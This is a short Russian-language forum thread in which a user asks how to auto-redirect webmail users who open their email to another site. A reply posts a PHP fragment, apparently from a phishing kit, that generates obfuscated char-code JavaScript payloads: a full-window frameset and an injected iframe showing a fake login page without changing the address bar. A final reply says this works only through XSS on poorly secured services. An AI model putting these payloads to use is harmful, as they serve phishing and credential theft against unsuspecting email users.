как можно сделать , когда юзверь находясь в своем почтовом ящике , кликнув на мое письмо , его автоматом перекидывало на определенный сайт?
в шкатулке была такая фишка // А вот сладкая инновация - вставка фрейма в натуральную величину окна, // что позволило не редиректить жертву на левый хост, а рисовать лживый // вход прямо в окне браузера, не паля адресную строку Code: case 'redirect': *for($x=0; $x !== strlen($redirect_to); $x++) // Шифруем код для редиректа на фейк *{ * if($x+1 == strlen($redirect_to)) $kopilka .= ord($redirect_to[$x]); * else $kopilka .= ord($redirect_to[$x]).','; *} $kopilka = '100,111,99,117,109,101,110,11'.'6'.',46,119,114,1'.'0'.'5,116,101,40,39,60,102,114,97,109,101,115,101,116,32,99,111,108,115,'. '61,49,48,48,37,3'.'2'.',114,111,11'.'9'.',115,61,4'.'9'.',48,48,37,32,98,111,114,100,101,114,'.'6'.'1,48,32,102,114,97,109'. ',101,98,111,114,100,101,114,61,48,32,102,114,97,109,101,115,112,97,99,105,110,103,61,48,62,6'. '0,102,114,97,109,101,32,102,114,97,109,101,98,111,114,100,101,114,61,48,32,115,114,99,61,34,'. $kopilka.',34,62,60,47,102,114,97,109,101,115,101,116,62,39,41'; *break; // Второе новшество - вставка ифрейма case 'iframe': *for($x=0; $x !== strlen($iframe_addr); $x++) // Шифруем код для редиректа на фейк *{ * if($x+1 == strlen($iframe_addr)) $kopilka .= ord($iframe_addr[$x]); * else $kopilka .= ord($iframe_addr[$x]).','; *} $kopilka = '120,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,10'. '5,102,114,97,109,101,39,41,59,120,46,115,114,99,61,34,'.$kopilka.',34,59,100,111,99,117,109,101,110,116,46,9'. '8,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,120,41,59'; *break; default: die('<font face=verdana color=red size=3><b>Выбрана неизвестная начинка для уязвимости!</b></font>'); } как это можно использовать?
если бы можно было редиректить так просто -то спамеры были бы по гроб жизни обязаны)) PS только через xss -да и то только на каких нить завшивых сервисах... ибо крупные врядли допустят такую уязвимость
